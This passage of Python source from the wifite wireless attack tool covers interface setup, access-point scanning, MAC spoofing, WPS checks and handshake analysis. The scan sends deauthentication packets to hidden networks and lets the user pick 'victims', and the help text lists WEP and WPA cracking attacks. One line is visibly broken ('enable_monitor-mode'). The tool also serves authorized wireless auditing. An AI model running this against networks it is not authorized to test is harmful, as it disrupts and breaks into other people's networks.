    print sw+'\t-i '+var+'<iface>  \t'+des+'wireless interface for capturing '+de+'[auto]'+W
    print sw+'\t-mac         \t'+des+'anonymize mac address            '+de+'[off]'+W
    print sw+'\t-c '+var+'<channel>\t'+des+'channel to scan for targets      '+de+'[auto]'+W
    print sw+'\t-e '+var+'<essid>  \t'+des+'target a specific access point by ssid (name)  '+de+'[ask]'+W
    print sw+'\t-b '+var+'<bssid>  \t'+des+'target a specific access point by bssid (mac)  '+de+'[auto]'+W
    print sw+'\t-showb       \t'+des+'display target BSSIDs after scan               '+de+'[off]'+W
    print sw+'\t-pow '+var+'<db>   \t'+des+'attacks any targets with signal strenghth > '+var+'db '+de+'[0]'+W
    print sw+'\t-quiet       \t'+des+'do not print list of APs during scan           '+de+'[off]'+W
    print ''

    print head+'\n   WPA'+W
    print sw+'\t-wpa        \t'+des+'only target WPA networks (works with -wps -wep)   '+de+'[off]'+W
    print sw+'\t-wpat '+var+'<sec>   \t'+des+'time to wait for WPA attack to complete (seconds) '+de+'[300]'+W
    print sw+'\t-wpadt '+var+'<sec>  \t'+des+'time to wait between sending deauth packets (sec) '+de+'[10]'+W
    print sw+'\t-strip      \t'+des+'strip handshake using tshark or pyrit             '+de+'[off]'+W
    print sw+'\t-crack '+var+'<dic>\t'+des+'crack WPA handshakes using '+var+'<dic>'+des+' wordlist file    '+de+'[off]'+W
    print sw+'\t-dict '+var+'<file>\t'+des+'specify dictionary to use when cracking WPA '+de+'[phpbb.txt]'+W
    print sw+'\t-aircrack   \t'+des+'verify handshake using aircrack '+de+'[on]'+W
    print sw+'\t-pyrit      \t'+des+'verify handshake using pyrit    '+de+'[off]'+W
    print sw+'\t-tshark     \t'+des+'verify handshake using tshark   '+de+'[on]'+W
    print sw+'\t-cowpatty   \t'+des+'verify handshake using cowpatty '+de+'[off]'+W

    print head+'\n   WEP'+W
    print sw+'\t-wep        \t'+des+'only target WEP networks '+de+'[off]'+W
    print sw+'\t-pps '+var+'<num>  \t'+des+'set the number of packets per second to inject '+de+'[600]'+W
    print sw+'\t-wept '+var+'<sec> \t'+des+'sec to wait for each attack, 0 implies endless '+de+'[600]'+W
    print sw+'\t-chopchop   \t'+des+'use chopchop attack      '+de+'[on]'+W
    print sw+'\t-arpreplay  \t'+des+'use arpreplay attack     '+de+'[on]'+W
    print sw+'\t-fragment   \t'+des+'use fragmentation attack '+de+'[on]'+W
    print sw+'\t-caffelatte \t'+des+'use caffe-latte attack   '+de+'[on]'+W
    print sw+'\t-p0841      \t'+des+'use -p0841 attack        '+de+'[on]'+W
    print sw+'\t-hirte      \t'+des+'use hirte (cfrag) attack '+de+'[on]'+W
    print sw+'\t-nofakeauth \t'+des+'stop attack if fake authentication fails    '+de+'[off]'+W
    print sw+'\t-wepca '+GR+'<n>  \t'+des+'start cracking when number of ivs surpass n '+de+'[10000]'+W
    print sw+'\t-wepsave    \t'+des+'save a copy of .cap files to this directory '+de+'[off]'+W

    print head+'\n   WPS'+W
    print sw+'\t-wps       \t'+des+'only target WPS networks         '+de+'[off]'+W
    print sw+'\t-wpst '+var+'<sec>  \t'+des+'max wait for new retry before giving up (0: never)  '+de+'[0]'+W
    print sw+'\t-wpsratio '+var+'<per>\t'+des+'min ratio of successful PIN attempts/total tries    '+de+'[0]'+W
    print sw+'\t-wpsretry '+var+'<num>\t'+des+'max number of retries for same PIN before giving up '+de+'[0]'+W

    print head+'\n   EXAMPLE'+W
    print sw+'\t./wifite.py '+W+'-wps -wep -c 6 -pps 600'+W
    print ''











###########################
# WIRELESS CARD FUNCTIONS #
###########################


def enable_monitor_mode(iface):
    """
        Uses airmon-ng to put a device into Monitor Mode.
        Then uses the get_iface() method to retrieve the new interface's name.
        Sets global variable IFACE_TO_TAKE_DOWN as well.
        Returns the name of the interface in monitor mode.
    """
    global IFACE_TO_TAKE_DOWN
    print GR+' [+]'+W+' enabling monitor mode on %s...' % (G+iface+W),
    stdout.flush()
    call(['airmon-ng', 'start', iface], stdout=DN, stderr=DN)
    print 'done'
    IFACE_TO_TAKE_DOWN = get_iface()
    return IFACE_TO_TAKE_DOWN


def disable_monitor_mode():
    """
        The program may have enabled monitor mode on a wireless interface.
        We want to disable this before we exit, so we will do that.
    """
    if IFACE_TO_TAKE_DOWN == '': return
    print GR+' [+]'+W+' disabling monitor mode on %s...' % (G+IFACE_TO_TAKE_DOWN+W),
    stdout.flush()
    call(['airmon-ng', 'stop', IFACE_TO_TAKE_DOWN], stdout=DN, stderr=DN)
    print 'done'

PRINTED_SCANNING = False
def get_iface():
    """
        Get the wireless interface in monitor mode. 
        Defaults to only device in monitor mode if found.
        Otherwise, enumerates list of possible wifi devices
        and asks user to select one to put into monitor mode (if multiple).
        Uses airmon-ng to put device in monitor mode if needed.
        Returns the name (string) of the interface chosen in monitor mode.
    """
    global PRINTED_SCANNING
    if not PRINTED_SCANNING:
        print GR+' [+]'+W+' scanning for wireless devices...'
        PRINTED_SCANNING = True

    proc  = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
    iface = ''
    monitors = []
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0: continue
        if ord(line[0]) != 32: # Doesn't start with space
            iface = line[:line.find(' ')] # is the interface
        if line.find('Mode:Monitor') != -1:
            monitors.append(iface)

    if WIRELESS_IFACE != '':
        if monitors.count(WIRELESS_IFACE): return WIRELESS_IFACE
        print R+' [!]'+O+' could not find wireless interface %s' % ('"'+R+WIRELESS_IFACE+O+'"'+W)

    if len(monitors) == 1:
        return monitors[0] # Default to only device in monitor mode
    elif len(monitors) > 1:
        print GR+" [+]"+W+" interfaces in "+G+"monitor mode:"+W
        for i, monitor in enumerate(monitors):
            print "  %s. %s" % (G+str(i+1)+W, G+monitor+W)
        ri = raw_input("%s [+]%s select %snumber%s of interface to use for capturing (%s1-%d%s): %s" % \
                  (GR,     W,       G,       W,                              G, len(monitors), W, G))
        while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
            ri = raw_input("%s [+]%s select number of interface to use for capturing (%s1-%d%s): %s" % \
                     (GR,   W,                                              G, len(monitors), W, G))
        i = int(ri)
        return monitors[i - 1]

    proc  = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
    for line in proc.communicate()[0].split('\n'):
        if len(line) == 0 or line.startswith('Interface'): continue
        #monitors.append(line[:line.find('\t')])
        monitors.append(line)

    if len(monitors) == 0:
        print R+' [!]'+O+" no wireless interfaces were found."+W
        print R+' [!]'+O+" you need to plug in a wifi device or install drivers.\n"+W
        exit_gracefully(0)
    elif WIRELESS_IFACE != '' and monitors.count(WIRELESS_IFACE) > 0:
        mac_anonymize(monitor)
        return enable_monitor-mode

    elif len(monitors) == 1:
        monitor = monitors[0][:monitors[0].find('\t')]
        mac_anonymize(monitor)

        return enable_monitor_mode(monitor)

    print GR+" [+]"+W+" available wireless devices:"
    for i, monitor in enumerate(monitors):
        print "  %s%d%s. %s" % (G, i + 1, W, monitor)

    ri = raw_input(GR+" [+]"+W+" select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
    while not ri.isdigit() or int(ri) < 1 or int(ri) > len(monitors):
        ri = raw_input(" [+] select number of device to put into monitor mode (%s1-%d%s): " % (G, len(monitors), W))
    i = int(ri)
    monitor = monitors[i-1][:monitors[i-1].find('\t')]
    mac_anonymize(monitor)

    return enable_monitor_mode(monitor)








######################
# SCANNING FUNCTIONS #
######################


def scan(channel=0, iface='', tried_rtl8187_fix=False):
    """
        Scans for access points. Asks user to select target(s).
            "channel" - the channel to scan on, 0 scans all channels.
            "iface"   - the interface to scan on. must be a real interface.
            "tried_rtl8187_fix" - We have already attempted to fix "Unknown error 132"
        Returns list of selected targets and list of clients.
    """
    remove_airodump_files(temp + 'wifite')

    command = ['airodump-ng', 
               '-a', # only show associated clients
               '-w', temp + 'wifite'] # output file
    if channel != 0:
        command.append('-c')
        command.append(str(channel))
    command.append(iface)

    proc = Popen(command, stdout=DN, stderr=DN)

    time_started = time.time()
    print GR+' [+] '+G+'initializing scan'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.'
    (targets, clients) = ([], [])
    try:
        deauth_sent = 0.0
        old_targets = []
        stop_scanning = False
        while True:
            time.sleep(0.3)
            if not os.path.exists(temp + 'wifite-01.csv') and time.time() - time_started > 1.0:
                print R+'\n [!] ERROR!'+W
                # RTL8187 Unknown Error 132 FIX
                if proc.poll() != None: # Check if process has finished
                    proc = Popen(['airodump-ng', iface], stdout=DN, stderr=PIPE)
                    if not tried_rtl8187_fix and proc.communicate()[1].find('failed: Unknown error 132') != -1:
                        if rtl8187_fix(iface):
                            return scan(channel=channel, iface=iface, tried_rtl8187_fix=True)
                print R+' [!]'+O+' wifite is unable to generate airodump-ng output files'+W
                print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
                exit_gracefully(1)

            (targets, clients) = parse_csv(temp + 'wifite-01.csv')

            # If we are targeting a specific ESSID/BSSID, skip the scan once we find it.
            if TARGET_ESSID != '':
                for t in targets:
                    if t.ssid.lower() == TARGET_ESSID.lower():
                        send_interrupt(proc)
                        try: os.kill(proc.pid, SIGTERM)
                        except OSError: pass
                        except UnboundLocalError: pass
                        targets = [t]
                        stop_scanning = True
                        break
            if TARGET_BSSID != '':
                for t in targets:
                    if t.bssid.lower() == TARGET_BSSID.lower():
                        send_interrupt(proc)
                        try: os.kill(proc.pid, SIGTERM)
                        except OSError: pass
                        except UnboundLocalError: pass
                        targets = [t]
                        stop_scanning = True
                        break

            # If user has chosen to target all access points, wait 20 seconds, then return all
            if ATTACK_ALL_TARGETS and time.time() - time_started > 10:
                print GR+'\n [+]'+W+' auto-targeted %s%d%s access point%s' % (G, len(targets), W, '' if len(targets) == 1 else 's')
                stop_scanning = True

            if ATTACK_MIN_POWER > 0 and time.time() - time_started > 10:
                # Remove targets with power < threshold
                i = 0
                before_count = len(targets)
                while i < len(targets):
                    if targets[i].power < ATTACK_MIN_POWER:
                        targets.pop(i)
                    else: i += 1
                print GR+'\n [+]'+W+' removed %s targets with power < %ddB, %s remain' % \
                                (G+str(before_count - len(targets))+W, ATTACK_MIN_POWER, G+str(len(targets))+W)
                stop_scanning = True

            if stop_scanning: break

            # If there are unknown SSIDs, send deauths to them.
            if channel != 0 and time.time() - deauth_sent > 5:
                deauth_sent = time.time()
                for t in targets:
                    if t.ssid == '':
                        print "\r %s deauthing hidden access point (%s)               \r" % \
                              (GR+sec_to_hms(time.time() - time_started)+W, G+t.bssid+W),
                        stdout.flush()
                        # Time to deauth
                        cmd = ['aireplay-ng',
                               '--deauth', '1',
                               '-a', t.bssid]
                        for c in clients:
                            if c.station == t.bssid:
                                cmd.append('-c')
                                cmd.append(c.bssid)
                                break
                        cmd.append(iface)
                        proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)
                        proc_aireplay.wait()
                        time.sleep(0.5)
                    else:
                        for ot in old_targets:
                            if ot.ssid == '' and ot.bssid == t.bssid:
                                print '\r %s successfully decloaked "%s"                     ' % \
                                        (GR+sec_to_hms(time.time() - time_started)+W, G+t.ssid+W)

                old_targets = targets[:]
            if VERBOSE_APS and len(targets) > 0:
                targets = sorted(targets, key=lambda t: t.power, reverse=True)
                if not WPS_DISABLE:
                    wps_check_targets(targets, temp + 'wifite-01.cap', verbose=False)

                os.system('clear')
                print GR+'\n [+] '+G+'scanning'+W+' ('+G+iface+W+'), updates at 5 sec intervals, '+G+'CTRL+C'+W+' when ready.\n'
                print "   NUM ESSID                 %sCH  ENCR  POWER  WPS?  CLIENT" % ('BSSID              ' if SHOW_MAC_IN_SCAN else '')
                print '   --- --------------------  %s--  ----  -----  ----  ------' % ('-----------------  ' if SHOW_MAC_IN_SCAN else '')
                for i, target in enumerate(targets):
                    print "   %s%2d%s " % (G, i + 1, W),
                    # SSID
                    if target.ssid == '':
                        p = O+'('+target.bssid+')'+GR+' '+W
                        print '%s' % p.ljust(20),
                    elif ( target.ssid.count('\x00') == len(target.ssid) ):
                        p = '<Length '+str(len(target.ssid))+'>'
                        print '%s' % C+p.ljust(20)+W,
                    elif len(target.ssid) <= 20:
                        print "%s" % C+target.ssid.ljust(20)+W,
                    else:
                        print "%s" % C+target.ssid[0:17] + '...'+W,
                    # BSSID
                    if SHOW_MAC_IN_SCAN:
                        print O,target.bssid+W,
                    # Channel
                    print G+target.channel.rjust(3),W,
                    # Encryption
                    if target.encryption.find("WEP") != -1: print G,
                    else:                                   print O,
                    print "\b%3s" % target.encryption.strip().ljust(4) + W,
                    # Power
                    if target.power >= 55:   col = G
                    elif target.power >= 40: col = O
                    else:                    col = R
                    print "%s%3ddb%s" % (col,target.power, W),
                    # WPS
                    if WPS_DISABLE:
                        print "  %3s" % (O+'n/a'+W),
                    else:
                        print "  %3s" % (G+'wps'+W if target.wps else R+' no'+W),
                    # Clients
                    client_text = ''
                    for c in clients:
                        if c.station == target.bssid: 
                            if client_text == '': client_text = 'client'
                            elif client_text[-1] != "s": client_text += "s"
                    if client_text != '': print '  %s' % (G+client_text+W)
                    else: print ''
                print ''
            print ' %s %s wireless networks. %s target%s and %s client%s found   \r' % (
                  GR+sec_to_hms(time.time() - time_started)+W, G+'scanning'+W, 
                  G+str(len(targets))+W, '' if len(targets) == 1 else 's', 
                  G+str(len(clients))+W, '' if len(clients) == 1 else 's'),

            stdout.flush()
    except KeyboardInterrupt:
        pass
    print ''

    send_interrupt(proc)
    try: os.kill(proc.pid, SIGTERM)
    except OSError: pass
    except UnboundLocalError: pass

    # Use "wash" program to check for WPS compatibility
    if not WPS_DISABLE:
        wps_check_targets(targets, temp + 'wifite-01.cap')

    remove_airodump_files(temp + 'wifite')

    if stop_scanning: return (targets, clients)
    print ''

    if len(targets) == 0:
        print R+' [!]'+O+' no targets found!'+W
        print R+' [!]'+O+' you may need to wait for targets to show up.'+W
        print ''
        exit_gracefully(1)

    if VERBOSE_APS: os.system('clear')

    # Sort by Power
    targets = sorted(targets, key=lambda t: t.power, reverse=True)

    victims = []
    print "   NUM ESSID                 %sCH  ENCR  POWER  WPS?  CLIENT" % ('BSSID              ' if SHOW_MAC_IN_SCAN else '')
    print '   --- --------------------  %s--  ----  -----  ----  ------' % ('-----------------  ' if SHOW_MAC_IN_SCAN else '')
    for i, target in enumerate(targets):
        print "   %s%2d%s " % (G, i + 1, W),
        # SSID
        if target.ssid == '':
            p = O+'('+target.bssid+')'+GR+' '+W
            print '%s' % p.ljust(20),
        elif ( target.ssid.count('\x00') == len(target.ssid) ):
            p = '<Length '+str(len(target.ssid))+'>'
            print '%s' % C+p.ljust(20)+W,
        elif len(target.ssid) <= 20:
            print "%s" % C+target.ssid.ljust(20)+W,
        else:
            print "%s" % C+target.ssid[0:17] + '...'+W,
        # BSSID
        if SHOW_MAC_IN_SCAN:
            print O,target.bssid+W,
        # Channel
        print G+target.channel.rjust(3),W,
        # Encryption
        if target.encryption.find("WEP") != -1: print G,
        else:                                   print O,
        print "\b%3s" % target.encryption.strip().ljust(4) + W,
        # Power
        if target.power >= 55:   col = G
        elif target.power >= 40: col = O
        else:                    col = R
        print "%s%3ddb%s" % (col,target.power, W),
        # WPS
        if WPS_DISABLE:
            print "  %3s" % (O+'n/a'+W),
        else:
            print "  %3s" % (G+'wps'+W if target.wps else R+' no'+W),
        # Clients
        client_text = ''
        for c in clients:
            if c.station == target.bssid: 
                if client_text == '': client_text = 'client'
                elif client_text[-1] != "s": client_text += "s"
        if client_text != '': print '  %s' % (G+client_text+W)
        else: print ''

    ri = raw_input(GR+"\n [+]"+W+" select "+G+"target numbers"+W+" ("+G+"1-%s)" % (str(len(targets))+W) + \
                         " separated by commas, or '%s': " % (G+'all'+W))
    if ri.strip().lower() == 'all':
        victims = targets[:]
    else:
        for r in ri.split(','):
            r = r.strip()
            if r.find('-') != -1:
                (sx, sy) = r.split('-')
                if sx.isdigit() and sy.isdigit():
                    x = int(sx)
                    y = int(sy) + 1
                    for v in xrange(x, y):
                        victims.append(targets[v - 1])
            elif not r.isdigit() and r.strip() != '':
                print O+" [!]"+R+" not a number: %s " % (O+r+W)
            elif r != '':
                victims.append(targets[int(r) - 1])

    if len(victims) == 0:
        print O+'\n [!] '+R+'no targets selected.\n'+W
        exit_gracefully(0)

    print ''
    print ' [+] %s%d%s target%s selected.' % (G, len(victims), W, '' if len(victims) == 1 else 's')

    return (victims, clients)


def parse_csv(filename):
    """
        Parses given lines from airodump-ng CSV file.
        Returns tuple: List of targets and list of clients.
    """
    if not os.path.exists(filename): return ([], [])
    try:
        f = open(filename, 'r')
        lines = f.read().split('\n')
        f.close()
    except IOError: return ([], [])

    hit_clients = False
    targets = []
    clients = []
    for line in lines:
        if line.startswith('Station MAC,'): hit_clients = True
        if line.startswith('BSSID') or line.startswith('Station MAC') or line.strip() == '': continue
        if not hit_clients: # Access points
            c = line.split(', ', 13)
            if len(c) < 11: continue
            cur = 11
            c[cur] = c[cur].strip()
            if not c[cur].isdigit(): cur += 1
            if cur >= len(c) - 1: continue

            ssid = c[cur+1]
            ssidlen = int(c[cur])
            ssid = ssid[:ssidlen]

            power = int(c[cur-4])
            if power < 0: power += 100

            enc = c[5]
            # Ignore non-WPA/WEP networks.
            if enc.find('WPA') == -1 and enc.find('WEP') == -1: continue
            if WEP_DISABLE and enc.find('WEP') != -1: continue
            if WPA_DISABLE and WPS_DISABLE and enc.find('WPA') != -1: continue
            enc = enc.strip()[:4]

            t = Target(c[0], power, c[cur-2].strip(), c[3], enc, ssid)
            targets.append(t)
        else: # Connected clients
            c = line.split(', ')
            if len(c) < 6: continue
            bssid   = re.sub(r'[^a-zA-Z0-9:]', '', c[0])
            station = re.sub(r'[^a-zA-Z0-9:]', '', c[5])
            power   = c[3]
            if station != 'notassociated':
                c = Client(bssid, station, power)
                clients.append(c)
    return (targets, clients)


def wps_check_targets(targets, cap_file, verbose=True):
    """
        Uses reaver's "walsh" (or wash) program to check access points in cap_file
        for WPS functionality. Sets "wps" field of targets that match to True.
    """
    global WPS_DISABLE

    if not program_exists('walsh') and not program_exists('wash'):
        WPS_DISABLE = True # Tell 'scan' we were unable to execute walsh
        return
    program_name = 'walsh' if program_exists('walsh') else 'wash'

    if len(targets) == 0 or not os.path.exists(cap_file): return
    if verbose:
        print GR+' [+]'+W+' checking for '+G+'WPS compatibility'+W+'...',
        stdout.flush()

    cmd = [program_name,
           '-f', cap_file,
           '-C'] # ignore Frame Check Sum errors
    proc_walsh = Popen(cmd, stdout=PIPE, stderr=DN)
    proc_walsh.wait()
    for line in proc_walsh.communicate()[0].split('\n'):
        if line.strip() == '' or line.startswith('Scanning for'): continue
        bssid = line.split(' ')[0]

        for t in targets:
            if t.bssid.lower() == bssid.lower():
                t.wps = True
    if verbose:
        print 'done'
    removed = 0
    if not WPS_DISABLE and WPA_DISABLE:
        i = 0
        while i < len(targets):
            if not targets[i].wps and targets[i].encryption.find('WPA') != -1:
                removed += 1
                targets.pop(i)
            else: i += 1
        if removed > 0 and verbose: print GR+' [+]'+O+' removed %d non-WPS-enabled targets%s' % (removed, W)


def rtl8187_fix(iface):
    """
        Attempts to solve "Unknown error 132" common with RTL8187 devices.
        Puts down interface, unloads/reloads driver module, then puts iface back up.
        Returns True if fix was attempted, False otherwise.
    """
    # Check if current interface is using the RTL8187 chipset
    proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN)
    proc_airmon.wait()
    using_rtl8187 = False
    for line in proc_airmon.communicate()[0].split():
        line = line.upper()
        if line.strip() == '' or line.startswith('INTERFACE'): continue
        if line.find(iface.upper()) and line.find('RTL8187') != -1: using_rtl8187 = True

    if not using_rtl8187: 
        # Display error message and exit
        print R+' [!]'+O+' unable to generate airodump-ng CSV file'+W
        print R+' [!]'+O+' you may want to disconnect/reconnect your wifi device'+W
        exit_gracefully(1)

    print O+" [!]"+W+" attempting "+O+"RTL8187 'Unknown Error 132'"+W+" fix..."

    original_iface = iface
    # Take device out of monitor mode
    airmon = Popen(['airmon-ng', 'stop', iface], stdout=PIPE, stderr=DN)
    airmon.wait()
    for line in airmon.communicate()[0].split('\n'):
        if line.strip() == '' or \
           line.startswith("Interface") or \
           line.find('(removed)') != -1:
            continue
        original_iface = line.split()[0] # line[:line.find('\t')]

    # Remove drive modules, block/unblock ifaces, probe new modules.
    print_and_exec(['ifconfig', original_iface, 'down'])
    print_and_exec(['rmmod', 'rtl8187'])
    print_and_exec(['rfkill', 'block', 'all'])
    print_and_exec(['rfkill', 'unblock', 'all'])
    print_and_exec(['modprobe', 'rtl8187'])
    print_and_exec(['ifconfig', original_iface, 'up'])
    print_and_exec(['airmon-ng', 'start', original_iface])

    print '\r                                                        \r',
    print O+' [!] '+W+'restarting scan...\n'

    return True


def print_and_exec(cmd):
    """
        Prints and executes command "cmd". Also waits half a second
        Used by rtl8187_fix (for prettiness)
    """
    print '\r                                                        \r',
    stdout.flush()
    print O+' [!] '+W+'executing: '+O+' '.join(cmd) + W,
    stdout.flush()
    call(cmd, stdout=DN, stderr=DN)
    time.sleep(0.1)



















####################
# HELPER FUNCTIONS #
####################

def remove_airodump_files(prefix):
    """
        Removes airodump output files for whatever file prefix ('wpa', 'wep', etc)
        Used by wpa_get_handshake() and attack_wep()
    """
    remove_file(prefix + '-01.cap')
    remove_file(prefix + '-01.csv')
    remove_file(prefix + '-01.kismet.csv')
    remove_file(prefix + '-01.kismet.netxml')
    for filename in os.listdir(temp):
        if filename.lower().endswith('.xor'): remove_file(temp + filename)
    for filename in os.listdir('.'):
        if filename.startswith('replay_') and filename.endswith('.cap'):
            remove_file(filename)
        if filename.endswith('.xor'): remove_file(filename)


def remove_file(filename):
    """
        Attempts to remove a file. Does not throw error if file is not found.
    """
    try: os.remove(filename)
    except OSError: pass


def program_exists(program):
    """
        Uses 'which' (linux command) to check if a program is installed.
    """

    proc = Popen(['which', program], stdout=PIPE, stderr=PIPE)
    txt = proc.communicate()
    if txt[0].strip() == '' and txt[1].strip() == '':
        return False
    if txt[0].strip() != '' and txt[1].strip() == '':
        return True

    return not (txt[1].strip() == '' or txt[1].find('no %s in' % program) != -1)


def sec_to_hms(sec):
    """
        Converts integer sec to h:mm:ss format
    """
    if sec <= -1: return '[endless]'
    h = sec / 3600
    sec %= 3600
    m  = sec / 60
    sec %= 60
    return '[%d:%02d:%02d]' % (h, m, sec)


def send_interrupt(process): 
    """
        Sends interrupt signal to process's PID. 
    """ 
    try:
        os.kill(process.pid, SIGINT) 
        # os.kill(process.pid, SIGTERM)
    except OSError: pass           # process cannot be killed
    except TypeError: pass         # pid is incorrect type
    except UnboundLocalError: pass # 'process' is not defined
    except AttributeError: pass    # Trying to kill "None"


def get_mac_address(iface):
    """
        Returns MAC address of "iface".
    """
    proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
    proc.wait()
    mac = ''
    first_line = proc.communicate()[0].split('\n')[0]
    for word in first_line.split(' '):
        if word != '': mac = word
    if mac.find('-') != -1: mac = mac.replace('-', ':')
    if len(mac) > 17: mac = mac[0:17]
    return mac


def generate_random_mac(old_mac):
    """
        Generates a random MAC address.
        Keeps the same vender (first 6 chars) of the old MAC address (old_mac).
        Returns string in format old_mac[0:9] + :XX:XX:XX where X is random hex
    """
    random.seed()
    new_mac = old_mac[:8].lower().replace('-', ':')
    for i in xrange(0, 6):
        if i % 2 == 0: new_mac += ':'
        new_mac += '0123456789abcdef'[random.randint(0,15)]

    # Prevent generating the same MAC address via recursion.
    if new_mac == old_mac:
        new_mac = generate_random_mac(old_mac)
    return new_mac


def mac_anonymize(iface):
    """
        Changes MAC address of 'iface' to a random MAC.
        Only randomizes the last 6 digits of the MAC, so the vender says the same.
        Stores old MAC address and the interface in ORIGINAL_IFACE_MAC
    """
    global ORIGINAL_IFACE_MAC
    if DO_NOT_CHANGE_MAC: return
    if not program_exists('ifconfig'): return

    # Store old (current) MAC address
    proc = Popen(['ifconfig', iface], stdout=PIPE, stderr=DN)
    proc.wait()
    for word in proc.communicate()[0].split('\n')[0].split(' '):
        if word != '': old_mac = word
    ORIGINAL_IFACE_MAC = (iface, old_mac)

    new_mac = generate_random_mac(old_mac)

    call(['ifconfig', iface, 'down'])

    print GR+" [+]"+W+" changing %s's MAC from %s to %s..." % (G+iface+W, G+old_mac+W, O+new_mac+W),
    stdout.flush()

    proc = Popen(['ifconfig', iface, 'hw', 'ether', new_mac], stdout=PIPE, stderr=DN)
    proc.wait()
    call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
    print 'done'


def mac_change_back():
    """
        Changes MAC address back to what it was before attacks began.
    """
    iface = ORIGINAL_IFACE_MAC[0]
    old_mac = ORIGINAL_IFACE_MAC[1]
    if iface == '' or old_mac == '': return

    print GR+" [+]"+W+" changing %s's mac back to %s..." % (G+iface+W, G+old_mac+W),
    stdout.flush()

    call(['ifconfig', iface, 'down'], stdout=DN, stderr=DN)
    proc = Popen(['ifconfig', iface, 'hw', 'ether', old_mac], stdout=PIPE, stderr=DN)
    proc.wait()
    call(['ifconfig', iface, 'up'], stdout=DN, stderr=DN)
    print "done"


def analyze_capfile(capfile):
    """
        Analyzes given capfile for handshakes using various programs.
        Prints results to console.
    """
    global TARGET_BSSID, TARGET_ESSID

    if TARGET_ESSID == '' and TARGET_BSSID == '':
        print R+' [!]'+O+' target ssid and bssid are required to check for handshakes'
        print R+' [!]'+O+' please enter essid (access point name) using -e <name>'
        print R+' [!]'+O+' and/or target bssid (mac address) using -b <mac>\n'
        # exit_gracefully(1)

    if TARGET_BSSID == '':
        # Get the first BSSID found in tshark!
        TARGET_BSSID = get_bssid_from_cap(TARGET_ESSID, capfile)
        # if TARGET_BSSID.find('->') != -1: TARGET_BSSID == ''
        if TARGET_BSSID == '':
            print R+' [!]'+O+' unable to guess BSSID from ESSID!'
        else:
            print GR+' [+]'+W+' guessed bssid: %s' % (G+TARGET_BSSID+W)

    if TARGET_BSSID != '' and TARGET_ESSID == '':
        TARGET_ESSID = get_essid_from_cap(TARGET_BSSID, capfile)

    print GR+'\n [+]'+W+' checking for handshakes in %s' % (G+capfile+W)

    t = Target(TARGET_BSSID, '', '', '', 'WPA', TARGET_ESSID)

    if program_exists('pyrit'):
        result = has_handshake_pyrit(t, capfile)
        print GR+' [+]'+W+'    '+G+'pyrit'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: pyrit'
    if program_exists('cowpatty'):
        result = has_handshake_cowpatty(t, capfile, nonstrict=True)
        print GR+' [+]'+W+'    '+G+'cowpatty'+W+' (nonstrict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
        result = has_handshake_cowpatty(t, capfile, nonstrict=False)
        print GR+' [+]'+W+'    '+G+'cowpatty'+W+' (strict):\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: cowpatty'
    if program_exists('tshark'):
        result = has_handshake_tshark(t, capfile)
        print GR+' [+]'+W+'    '+G+'tshark'+W+':\t\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: tshark'
    if program_exists('aircrack-ng'):
        result = has_handshake_aircrack(t, capfile)
        print GR+' [+]'+W+'    '+G+'aircrack-ng'+W+':\t\t %s' % (G+'found!'+W if result else O+'not found'+W)
    else: print R+' [!]'+O+' program not found: aircrack-ng'

    print ''

    exit_gracefully(0)


def get_essid_from_cap(bssid, capfile):
    """
        Attempts to get ESSID from cap file using BSSID as reference.
        Returns '' if not found.
    """
    if not program_exists('tshark'): return ''

    cmd = ['tshark',
           '-r', capfile,
           '-R', 'wlan.fc.type_subtype == 0x05 && wlan.sa == %s' % bssid,
           '-n']
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    for line in proc.communicate()[0].split('\n'):
        if line.find('SSID=') != -1:
            essid = line[line.find('SSID=')+5:]
            print GR+' [+]'+W+' guessed essid: %s' % (G+essid+W)
            return essid
    print R+' [!]'+O+' unable to guess essid!'+W
    return ''


def get_bssid_from_cap(essid, capfile):
    """
        Returns first BSSID of access point found in cap file.
        This is not accurate at all, but it's a good guess.
        Returns '' if not found.
    """
    global TARGET_ESSID

    if not program_exists('tshark'): return ''

     # Attempt to get BSSID based on ESSID
    if essid != '':
        cmd = ['tshark',
               '-r', capfile,
               '-R', 'wlan_mgt.ssid == "%s" && wlan.fc.type_subtype == 0x05' % (essid),
               '-n',            # Do not resolve MAC vendor names
               '-T', 'fields',  # Only display certain fields
               '-e', 'wlan.sa'] # souce MAC address
        proc = Popen(cmd, stdout=PIPE, stderr=DN)
        proc.wait()
        bssid = proc.communicate()[0].split('\n')[0]
        if bssid != '': return bssid

    cmd = ['tshark',
           '-r', capfile,
           '-R', 'eapol',
           '-n']
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    for line in proc.communicate()[0].split('\n'):
        if line.endswith('Key (msg 1/4)') or line.endswith('Key (msg 3/4)'):
            while line.startswith(' ') or line.startswith('\t'): line = line[1:]
            line = line.replace('\t', ' ')
            while line.find('  ') != -1: line = line.replace('  ', ' ')
            return line.split(' ')[2]
        elif line.endswith('Key (msg 2/4)') or line.endswith('Key (msg 4/4)'):
            while line.startswith(' ') or line.startswith('\t'): line = line[1:]
            line = line.replace('\t', ' ')
            while line.find('  ') != -1: line = line.replace('  ', ' ')
            return line.split(' ')[4]
    return ''


def exit_gracefully(code):
    """
        We may exit the program at any time.
        We want to remove the temp folder and any files contained within it.
        Removes the temp files/folder and exists with error code "code".
    """
    # Remove temp files and folder
    if os.path.exists(temp):
        for file in os.listdir(temp):
            os.remove(temp + file)
        os.rmdir(temp)
    # Disable monitor mode if enabled by us
    disable_monitor_mode()
    # Change MAC address back if spoofed
    mac_change_back()
